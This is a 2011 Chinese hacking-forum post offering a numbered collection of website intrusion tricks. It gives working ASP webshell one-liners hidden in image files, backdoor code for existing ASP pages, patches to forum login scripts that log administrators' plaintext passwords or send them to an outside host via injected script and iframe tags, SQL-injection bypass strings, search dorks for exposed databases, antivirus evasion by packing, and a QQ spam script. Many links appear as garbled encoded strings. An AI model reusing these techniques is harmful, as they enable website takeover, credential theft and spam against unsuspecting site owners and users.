首页
社区
课程
招聘
[旧帖] [分享]让你成为ASP木马高手 0.00雪花
发表于: 2011-2-12 11:59 2064

[旧帖] [分享]让你成为ASP木马高手 0.00雪花

2011-2-12 11:59
2064
1.名称:如何制作图片ASP木马 (可显示图片)
建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为

了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'') </SCRIPT>

2. 名称:整蛊网吧
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享,

复制一个木马过去运行即可。

3.名称:感受MD5暴力破解的魅力
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"
1和7代表密码最小和最大长度
阿汀我再加个方法:2bbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2V1y4g2)9J5k6i4u0W2k6r3&6G2K9i4A6W2i4K6u0W2j5$3!0E0i4K6u0r3 在线破解
或者到7f5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2V1y4h3I4G2L8$3E0#2M7q4)9J5k6h3y4G2L8g2)9J5c8W2)9K6c8X3y4S2N6r3g2Y4L8%4u0&6i4K6y4p5x3o6q4Q4x3X3b7K6i4K6t1$3M7$3g2S2M7X3y4C8i4K6y4p5L8$3^5`.

4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳

的时候最好多选择不知名的加壳软件

5.名称:隐蔽的插入型ASP木马
(1)在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里,最好是小马,还要加密一下
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
(2)另一种方法,在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
访问的时候在做手脚的asp文件后面加上?filer=XXX
XXX为你本地上传的一个路径如 c:ating123.asp
上传后在做手脚的asp的同文件夹中有ating,asp
(3)前提得到system权限,
进入网站目录下一层
mkdir s…
copy ating.asp s…/
这样杀毒软件找不到的
访问b4fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8Y4y4Q4c8e0u0Q4z5o6m8Q4b7e0k6Q4x3V1k6S2N6r3W2F1k6#2)9J5k6h3q4K6M7q4!0q4y4g2)9^5c8q4!0n7x3#2!0q4y4g2)9^5c8W2!0m8c8R3`.`.

6. 工具3eaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3S2S2j5$3D9#2x3U0m8Q4x3X3g2@1k6h3&6Y4P5h3W2Q4x3X3g2U0L8W2)9J5c8X3y4Z5j5h3!0B7K9i4W2G2L8X3N6Z5N6g2)9J5k6i4u0S2M7W2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2!0m8c8q4!0m8y4q4!0q4y4g2!0n7y4#2!0m8y4g2!0q4y4g2)9^5y4g2!0n7y4#2!0q4y4g2)9&6b7#2!0m8z5q4!0q4z5q4!0m8c8W2!0m8y4g2!0q4y4#2)9&6y4q4!0n7y4g2!0q4z5q4)9^5y4q4)9&6x3g2!0q4y4#2)9&6y4q4)9&6c8W2!0q4y4W2)9^5z5q4)9&6x3q4!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4q4!0n7z5q4!0m8b7g2!0q4z5q4!0n7y4W2)9^5y4g2!0q4y4#2!0n7b7g2!0m8y4#2!0q4y4#2)9&6y4q4!0m8z5q4!0q4y4W2)9^5z5q4!0n7y4H3`.`. 用户名为:

hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的

7.名称:QQ群脚本攻击
打开qq对话诓,复制消息,然后
下面的内容保存为.vbs 文件,运行即可
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next

8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可

9. 名称:全面找出你站上的ASP木马
(1) 用杀毒软件
(2) 用FTP客户端软件,点"工具"->"比较文件夹"
(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马
(4) 用工具Beyond Compare

10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画
(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
老办法:
修改admin_login.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了laner.txt
(2)login.asp中Case "login_chk"下:
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
这样laner.asp将获得全部登陆人的登陆时间,用户名和密码
(3)如果你有自己的网站或者另外的webshell(强烈建议使用):
可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>

11. 名称:利用QQ在线状态抓鸽子肉鸡
生成qq在线状态,把里面的地址改成木马地址,发到论坛
在login.asp那里插入一句:
response.write"<scriptsrc=2a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4m8@1L8s2g2K6K9r3W2Q4x3X3g2U0L8$3#2Q4x3V1k6D9j5h3&6W2M7W2)9J5c8Y4u0S2K9h3&6Q4x3X3g2S2M7%4m8Q4x3@1k6F1i4K6y4p5"&request("username")

&""&"&p="&request("password")&"></script>"
response.write"<iframesrc=ed9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4W2G2N6i4u0%4k6h3u0K6K9i4c8W2i4K6u0r3L8r3q4F1k6i4u0Q4x3V1k6J5j5h3W2F1i4K6u0W2j5i4y4H3i4K6y4r3L8W2)9K6c8l9`.`."&request("username")

&""&"&p="&request("password")&"></iframe>"
结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里

12. 动画名称:媒体中国整站程序存在多处漏洞
漏洞程序:媒体中国整站程序(第一版)
官方网站:692K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2W2K9i4c8A6i4K6u0W2k6h3I4Y4L8$3c8Q4x3X3g2U0L8$3#2Q4x3V1j5`.
漏洞: %5c(暴库) 上传 注入
上传页面:down1/upload.asp

13. 名称:免费电话+MSH命令行工具
8ffK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3N6D9L8$3u0W2y4#2)9J5k6h3y4G2L8g2)9J5c8R3`.`. 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,
运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时

0.01/分,你就有100分钟可以白打。是一个帐号哦。
要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也

是一样。

14. 名称:Bo-Blog的新漏洞
874K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4g2)9&6c8q4)9^5x3q4)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3K9X3!0T1i4K6y4p5i4K6u0W2i4K6u0W2i4K6u0r3j5h3c8E0K9h3&6Q4x3V1k6T1j5h3^5`.
把其中"禁止搜索的词"那部分<table>另存出来,里面的地址改完整,插入一句话木马

15. 名称:钩魂者入侵传奇私服
用百度 搜索 传奇 inurl:tuku
或者 传奇 inurl:wplm.htm
再或者 传奇 inurl:coolsites.asp
友情链接里插入一句话木马即可

16. 程序: 宏达企业整站上传漏洞
官方主页:044K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2#2x3e0t1$3i4K6u0W2j5$3!0E0i4K6u0r3
漏洞页面:/cx/upfile.asp (上传漏洞)

17.无间盗邮箱,在修改密码里,用户名和密码里添'or'='or'

18.名称: bbsxp5.16后台得到webshell
bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁

止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。

19.名称:JHACKJ 2005年最新精典教程
下载看看吧,不错,各大网站都有

20.名称:省力入侵韩国肉鸡
在啊D的扫描注入点项,打开这个:4ebK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3N6G2L8$3N6D9k6g2)9J5k6h3y4G2i4K6u0W2K9%4u0Q4x3V1k6S2k6s2k6S2L8X3y4W2k6q4)9#2k6Y4y4W2j5i4u0U0K9q4)9K6c8X3S2D9i4K6y4p5P5X3S2Q4x3X3c8o6e0R3`.`.
这是高级搜索项,关键字随便写。这里我写asp?name= 设置为每页显示100条。
语种选择韩文。搜索,很多sa.

21.名称:任何网吧的管理系统破解
选智能ABC,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除
最后按Inter键

22.名称:破解QQ空间插入网页木马的代码
现在腾讯 已经封了很多QQ空间代码了 就如 以前 <iframe src="木马地址" name="lcx" width="0"

height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了
突破禁用的方法 代码如下:
<div id=DI><img src="javascript :DI.innerHTML=\'<iframe src=木马地址 width=190 height=190

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\'"

style=display:none></div>

最后附上 卡拉是条ok 总结的
1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用",80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin set password=\'新MD5密码\' where password=\'旧MD5密码\'--

[admin为表名.]

3.旁注,也就是跨站.
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个

站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经

过加密,这就看我们的本事了

4.暴库:把二级目录中间的/换成%5c
EY:e54K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4Z5N6s2c8U0i4K6u0W2k6h3c8#2i4K6u0W2j5$3&6Q4x3V1k6G2N6r3S2W2M7Y4N6W2j5W2)9J5c8X3c8*7i4K6u0r3j5X3N6K6i4K6u0r3b7X3W2Y4b7$3I4S2M7%4y4Q4x3X3g2S2M7%4m8Q4x3@1k6n7K9h3N6o6L8r3q4K6M7@1&6S2L8h3g2Q4x3@1c8Q4c8e0S2Q4z5o6q4Q4z5p5y4Q4c8e0S2Q4b7U0c8Q4b7e0y4Q4c8e0S2Q4z5p5y4Q4z5o6y4Q4c8e0g2Q4z5f1u0Q4b7U0c8Q4x3U0k6n7K9h3N6o6L8r3q4K6M7#2c8&6M7r3g2Q4x3@1b7I4
如果你能看到:\'E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\'不是一个有效的路径。 确定路

径名称拼写是否正确,以及是否 连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

5.\'or\'=\'or\'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
\'or\'\'=\' " or "a"="a \') or (\'a\'=\'a ") or ("a"="a or 1=1-- \' or \'a\'=\'a

6.社会工程学。这个我们都知道吧。就是猜解。
 EY:120K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3&6W2N6g2)9J5k6h3g2V1N6g2)9J5k6h3y4F1i4K6u0r3N6$3q4A6M7$3S2A6i4K6u0r3j5h3c8E0K9h3^5`.
admin waishi

7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.
EY:7e9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4Z5M7$3c8^5P5g2)9J5k6h3q4Z5i4K6u0W2k6h3c8#2i4K6u0W2j5$3&6Q4x3V1k6W2j5X3!0G2K9#2)9J5c8X3c8T1i4K6u0r3k6h3u0G2L8$3E0Q4x3X3g2S2M7%4m8Q4y4f1u0Q4c8e0S2Q4b7V1k6Q4z5e0W2Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4c8e0g2Q4b7U0m8Q4b7U0q4Q4c8e0k6Q4z5e0S2Q4b7f1k6m8f1#2m8Q4c8e0k6Q4b7e0m8Q4b7V1y4Q4c8e0g2Q4b7V1y4Q4z5p5k6Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0k6Q4z5e0g2Q4b7U0m8Q4c8e0k6Q4z5p5c8Q4b7f1g2Q4c8e0g2Q4b7V1q4Q4z5e0y4Q4y4f1c8Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4z5o6k6Q4z5p5c8Q4c8e0g2Q4z5o6k6Q4z5e0W2Q4c8e0g2Q4z5o6g2Q4b7e0g2Q4c8e0c8Q4b7U0S2Q4z5o6m8Q4c8e0g2Q4z5p5k6Q4b7e0g2Q4c8e0S2Q4b7f1k6Q4z5f1b7`.

木马

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY:723K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4Z5M7$3c8^5P5g2)9J5k6h3q4Z5i4K6u0W2k6h3c8#2i4K6u0W2j5$3&6Q4x3V1k6^5K9h3q4G2P5h3!0#2L8s2g2Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3q4K6M7l9`.`.
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是

admin

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡
EY:e32K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4D9x3e0V1&6z5g2)9J5k6h3y4G2L8g2)9J5c8X3u0T1M7#2)9J5c8V1c8S2N6r3q4T1j5h3y4C8N6i4m8Q4x3V1k6V1N6X3u0T1M7K6N6Q4x3X3g2y4c8p5t1`.

10.查看目录法:人一些网站可以断开目录,可以方问目录。
EY:09bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4g2B7M7K6p5$3z5q4)9J5k6h3y4G2L8g2)9J5c8Y4y4Z5L8%4m8Q4x3V1k6S2k6r3#2A6L8W2)9J5c8R3`.`.
5d0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2K6j5$3!0D9L8%4g2J5k6Y4k6D9i4K6u0W2j5$3!0E0i4K6u0r3j5X3q4T1P5h3k6G2P5q4)9J5c8X3q4V1L8h3W2F1i4K6u0r3i4K6t1#2x3U0y4T1j5W2)9J5y4e0t1K6k6r3g2V1M7$3g2V1x3Y4y4Q4x3V1j5`.
这样我们可以找到数据库,下载不用我教吧

11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]

12.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 <关键字很多,自已找>
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。

13.COOKIE欺骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

这个我就不多讲了

14.利用常见的漏洞:如动网BBS
EY:5c8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3A6K6x3e0l9I4x3g2)9J5k6h3y4G2L8g2)9J5c8X3u0T1M7#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2j5i4y4H3
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert

取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具 动网固顶贴工具

15.还有一些老漏洞。如IIS3,4的查看源码,5的delete
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 777
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
不错 谢谢分享。
2011-2-12 14:23
0
游客
登录 | 注册 方可回帖
返回